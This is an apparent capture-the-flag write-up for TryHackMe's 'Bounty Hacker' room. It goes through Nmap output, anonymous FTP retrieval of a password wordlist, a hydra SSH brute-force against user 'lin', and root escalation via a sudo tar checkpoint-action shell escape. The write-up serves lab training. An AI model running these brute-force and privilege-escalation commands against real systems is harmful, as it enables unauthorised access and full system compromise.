Bounty Hacker - TryHackMe
Happy Hacking! #
TryHackMe Easy Room
Nmap Scan #
21/tcp open ftp syn-ack vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: TIMEOUT
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.8.23.241
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 3
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh syn-ack OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 dc:f8:df:a7:a6:00:6d:18:b0:70:2b:a5:aa:a6:14:3e (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCgcwCtWTBLYfcPeyDkCNmq6mXb/qZExzWud7PuaWL38rUCUpDu6kvqKMLQRHX4H3vmnPE/YMkQIvmz4KUX4H/aXdw0sX5n9jrennTzkKb/zvqWNlT6zvJBWDDwjv5g9d34cMkE9fUlnn2gbczsmaK6Zo337F40ez1iwU0B39e5XOqhC37vJuqfej6c/C4o5FcYgRqktS/kdcbcm7FJ+fHH9xmUkiGIpvcJu+E4ZMtMQm4bFMTJ58bexLszN0rUn17d2K4+lHsITPVnIxdn9hSc3UomDrWWg+hWknWDcGpzXrQjCajO395PlZ0SBNDdN+B14E0m6lRY9GlyCD9hvwwB
| 256 ec:c0:f2:d9:1e:6f:48:7d:38:9a:e3:bb:08:c4:0c:c9 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBMCu8L8U5da2RnlmmnGLtYtOy0Km3tMKLqm4dDG+CraYh7kgzgSVNdAjCOSfh3lIq9zdwajW+1q9kbbICVb07ZQ=
| 256 a4:1a:15:a5:d4:b1:cf:8f:16:50:3a:7d:d0:d8:13:c2 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAICqmJn+c7Fx6s0k8SCxAJAoJB7pS/RRtWjkaeDftreFw
80/tcp open http syn-ack Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
So, we have FTP, SSH and HTTP running.
FTP #
The FTP is accessible with anonymous login.
ftp> ls -la
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x 2 ftp ftp 4096 Jun 07 21:47 .
drwxr-xr-x 2 ftp ftp 4096 Jun 07 21:47 ..
-rw-rw-r-- 1 ftp ftp 418 Jun 07 21:41 locks.txt
-rw-rw-r-- 1 ftp ftp 68 Jun 07 21:47 task.txt
226 Directory send OK.
ftp>
- locks.txt
locks.txt contains a wordlist that can help us to get user access.$ cat locks.txt rEddrAGON ReDdr4g0nSynd!cat3 Dr@gOn$yn9icat3 R3DDr46ONSYndIC@Te ReddRA60N R3dDrag0nSynd1c4te dRa6oN5YNDiCATE ReDDR4g0n5ynDIc4te R3Dr4gOn2044 RedDr4gonSynd1cat3 R3dDRaG0Nsynd1c@T3 Synd1c4teDr@g0n reddRAg0N REddRaG0N5yNdIc47e Dra6oN$yndIC@t3 4L1mi6H71StHeB357 rEDdragOn$ynd1c473 DrAgoN5ynD1cATE ReDdrag0n$ynd1cate Dr@gOn$yND1C4Te RedDr@gonSyn9ic47e REd$yNdIc47e dr@goN5YNd1c@73 rEDdrAGOnSyNDiCat3 r3ddr@g0N ReDSynd1ca7e - task.txt
task.txt contains list of tasks to do written by ‘lin’.$ cat task.txt 1.) Protect Vicious. 2.) Plan for Red Eye pickup on the moon. -linSo, from this point, we have potential user and wordlist to bruteforce ssh login.
Bruteforcing Login #
Let’s power up hydra and get in!
$ hydra -l lin -P ftp/locks.txt <IP_ADDRESS> ssh
********
[22][ssh] host: 10.10.242.96 login: lin password: [REDACTED]
********
Login with the ssh credential as user lin!
Priv Esc #
To get to root, we can abuse lin’s sudo privilege.
type in sudo -l to list lin’s privilege.
lin@bountyhacker:~$ sudo -l
[sudo] password for lin:
Matching Defaults entries for lin on bountyhacker:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User lin may run the following commands on bountyhacker:
(root) /bin/tar
From here, we know we can execute tar as root with sudo, so let’s find tar command that can be abused in GTFOBins.
So, to get a root shell just run sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh as lin!
